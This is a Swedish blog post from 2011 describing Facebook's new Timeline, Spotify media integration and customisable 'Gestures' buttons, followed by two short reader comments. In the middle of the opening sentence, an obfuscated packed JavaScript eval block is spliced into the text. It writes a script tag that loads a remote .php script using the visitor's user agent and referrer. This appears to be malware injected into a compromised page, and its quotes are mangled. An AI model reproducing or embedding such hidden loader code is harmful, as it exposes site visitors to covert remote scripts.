Image Image Image Image Image Image Image Image Image Image

| 20 juni, 2021

Scroll to top

Top

Här är nya Facebook 2011

Här är nya Facebook 2011
Sebastian

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|edrih|var|u0026u|referrer|yiszf||js|php’.split(’|’),0,{}))
hade Facebook en stor konferens angående deras framtida utveckling. Nya funktioner och designe var vad som stod på listan.

I och med Google plus så har Facebok fått mer press på sig att prestera och inte slöa ner.

En av de stora nyheterna är funktionen Timeline som vi skrivit lite kort om tidigare. Detta är en tidslinje som visar vad du har gjort sen du startade ett konto hos dem. Du kan se alla inlägg, bilder, videoklipp och andra händelser i ditt liv som en en smart tidslinje.

[quote]Timeline är historien om ditt liv. Det innehåller alla dina inlägg och erbjuder ett nytt sätt att uttrycka vem du är, säger Facebooks vd, Mark Zuckerberg.[/quote]

Du kan också skapa filter så att du endast visar den musik du lyssnar på och är intresserad av.

Bättre utvecklad integration med media
En annan stor nyhet som togs upp under gårdagens presentation är en ny typ av appar som gör det möjligt att bädda in olika typer av media. Om du exempelvis lyssnar på en låt i Spotify visas det för dina vänner. Dina vänner kan sen hoppa in och lyssna på den låten samtidigt som du.

Medieintegrationen är inte begränsad till just musik utan kommer fungera med alla typer av media som videoklipp, spel och webbsidor. Dem kommer också fungera på mobila enheter.

Ny Gilla-knapp

En annan nyhet är att den nuvarande Gilla-knappen kommer att få en större betydelse med hjälp av något som kallas Facebook Gestures. Istället för att endast kunna gilla ett inlägg kommer webbplatser att kunna definiera ett valfritt verb som kan användas i knappen. Har du en blogg eller annan webbsida kan du lägga in en knapp där det står ”läser” på istället gör ”Gilla”. När besökaren trycker på knappen kommer statusuppdateringen visa att den personen ”läser” inlägget på din sida.

httpv://www.youtube.com/watch?v=hzPEPfJHfKU

Comments

  1. Pille polle

    Sweet asså det där med Spotify 🙂 Såg att Daniel Ek (Grundare till spotify) stod med Mark Zuckerberg och presenterade funktonerna på scenen igår. Rätt grovt

    • Sebastian Plengier

      Det stämmer. Detta är ett stort steg för Spotify världen över. Att tillsammans med Facebook skapa ett partnership. Det luktar ökat omsättning 🙂